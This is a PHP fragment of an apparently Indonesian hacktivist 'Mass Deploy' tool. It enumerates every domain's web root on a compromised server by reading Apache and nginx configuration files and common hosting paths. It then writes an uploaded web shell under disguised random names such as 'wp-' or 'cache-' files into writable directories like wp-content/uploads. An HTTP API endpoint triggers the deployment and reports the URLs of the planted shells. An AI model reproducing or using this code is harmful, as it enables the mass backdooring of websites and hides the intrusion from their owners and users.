3;
});
return array_values($domains);
}
function generate_random_filename() {
$safe_patterns = [
'class-%s.php',
'helper-%s.php',
'util-%s.php',
'module-%s.php',
'include-%s.php',
'lib-%s.php',
'func-%s.php',
'data-%s.php',
'api-%s.php',
'ajax-%s.php',
'common-%s.php',
'core-%s.php',
'base-%s.php',
'wp-%s.php',
'admin-%s.php',
'template-%s.php',
'page-%s.php',
'form-%s.php',
'cache-%s.php',
'session-%s.php'
];
$random_id = substr(md5(mt_rand() . time() . uniqid()), 0, 8);
$pattern = $safe_patterns[array_rand($safe_patterns)];
return sprintf($pattern, $random_id);
}
function find_domain_paths($domain) {
$domain_paths = [];
$web_roots = [
$_SERVER['DOCUMENT_ROOT'] ?? '',
'/var/www',
'/var/www/html',
'/var/www/vhosts',
'/var/www/sites',
'/home',
'/usr/local/www',
'/usr/local/httpd',
'/usr/local/apache',
'/usr/local/apache2',
'/usr/local/nginx',
'/usr/share/nginx',
'/usr/share/httpd',
'/srv/www',
'/srv/http',
'/srv/httpd',
'/srv/sites',
'/opt/lampp/htdocs',
'/opt/xampp/htdocs'
];
$domain_clean = str_replace(['www.', '.'], ['', '_'], $domain);
$domain_parts = explode('.', $domain);
$domain_base = $domain_parts[0];
$domain_variants = [
$domain,
'www.' . $domain,
str_replace('www.', '', $domain),
$domain_clean,
$domain_base
];
$server_configs = [
'/etc/apache2/sites-enabled/*.conf',
'/etc/apache2/sites-available/*.conf',
'/etc/httpd/conf.d/*.conf',
'/etc/httpd/vhosts.d/*.conf',
'/etc/nginx/sites-enabled/*',
'/etc/nginx/conf.d/*.conf',
'/usr/local/etc/apache*/extra/httpd-vhosts.conf',
'/usr/local/etc/nginx/sites-enabled/*'
];
foreach ($server_configs as $pattern) {
$configs = glob($pattern);
if ($configs) {
foreach ($configs as $config) {
$content = @file_get_contents($config);
if ($content && stripos($content, $domain) !== false) {
$doc_pattern = '/(?:DocumentRoot|root)\s+[\'"]?([^\'"\s;]+)[\'"]?/i';
if (preg_match($doc_pattern, $content, $doc_match)) {
$path = $doc_match[1];
if (is_dir($path) && is_writable($path)) {
$domain_paths[] = $path;
}
}
}
}
}
}
foreach ($web_roots as $root) {
if (empty($root) || !is_dir($root) || !is_readable($root)) continue;
foreach ($domain_variants as $variant) {
$path = "$root/$variant";
if (is_dir($path)) {
$domain_paths[] = $path;
$subdirs = ['public_html', 'httpdocs', 'www', 'public', 'web', 'htdocs'];
foreach ($subdirs as $subdir) {
$subpath = "$path/$subdir";
if (is_dir($subpath)) {
$domain_paths[] = $subpath;
}
}
}
}
}
$cpanel_patterns = [
"/home/*/public_html",
];
foreach ($cpanel_patterns as $pattern) {
$matching_paths = glob($pattern, GLOB_ONLYDIR);
foreach ($matching_paths as $path) {
$domain_dir = $path . '/' . $domain;
if (is_dir($domain_dir)) {
$domain_paths[] = $domain_dir;
}
}
}
$domain_paths = array_unique($domain_paths);
$writable_paths = [];
foreach ($domain_paths as $path) {
if (is_writable($path)) {
$writable_paths[] = $path;
}
}
return !empty($writable_paths) ? $writable_paths : $domain_paths;
}
function deploy_to_domains($domains, $content) {
$results = [];
if (empty($content)) {
return [
"error" => "No content provided for deployment"
];
}
$max_time = 30;
$start_time = time();
foreach ($domains as $domain) {
if (time() - $start_time > $max_time) {
$results[] = ["domain" => $domain, "status" => "skipped", "reason" => "Time limit exceeded"];
continue;
}
$success = false;
$deployed_path = "";
$deployed_url = "";
$shell_name = generate_random_filename();
$domain_paths = find_domain_paths($domain);
if (empty($domain_paths)) {
$results[] = [
"domain" => $domain,
"status" => "failed",
"error" => "No valid paths found for this domain"
];
continue;
}
foreach ($domain_paths as $base_path) {
if (time() - $start_time > $max_time) {
break;
}
$shell_path = $base_path . '/' . $shell_name;
if (@file_put_contents($shell_path, $content)) {
if (file_exists($shell_path) && filesize($shell_path) > 0) {
$success = true;
$deployed_path = $shell_path;
$deployed_url = 'http://' . $domain . '/' . $shell_name;
break;
}
}
$common_writeable_dirs = [
'wp-content/uploads',
'wp-content/themes',
'wp-content',
'images',
'img',
'uploads',
'media',
'files',
'cache',
'tmp',
'temp',
'assets',
'data',
'logs'
];
foreach ($common_writeable_dirs as $subdir) {
$dir_path = $base_path . '/' . $subdir;
if (is_dir($dir_path) && is_writable($dir_path)) {
$shell_path = $dir_path . '/' . $shell_name;
if (@file_put_contents($shell_path, $content)) {
if (file_exists($shell_path) && filesize($shell_path) > 0) {
$success = true;
$deployed_path = $shell_path;
$deployed_url = 'http://' . $domain . '/' . $subdir . '/' . $shell_name;
break 2;
}
}
}
}
}
if ($success) {
$results[] = [
"domain" => $domain,
"status" => "success",
"path" => $deployed_path,
"url" => $deployed_url,
"filename" => $shell_name
];
} else {
$results[] = [
"domain" => $domain,
"status" => "failed",
"error" => "No writable directory found or access denied"
];
}
}
return $results;
}
// Handle API request
if (isset($_GET['api']) && $_GET['api'] === 'deploy') {
header('Content-Type: application/json');
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['shell_file']) && $_FILES['shell_file']['error'] === UPLOAD_ERR_OK) {
$shell_content = file_get_contents($_FILES['shell_file']['tmp_name']);
if (!empty($shell_content)) {
$domains = get_domains();
if (!empty($domains)) {
$results = deploy_to_domains($domains, $shell_content);
echo json_encode(['status' => 'success', 'results' => $results]);
} else {
echo json_encode(['status' => 'error', 'message' => 'No domains found on this server']);
}
} else {
echo json_encode(['status' => 'error', 'message' => 'Failed to read uploaded file']);
}
} else {
echo json_encode(['status' => 'error', 'message' => 'Please upload a valid shell file']);
}
} else {
echo json_encode(['status' => 'error', 'message' => 'Method not allowed']);
}
exit;
}
?>
Mass Deploy
HACKTIVIST INDONESIA TOOLS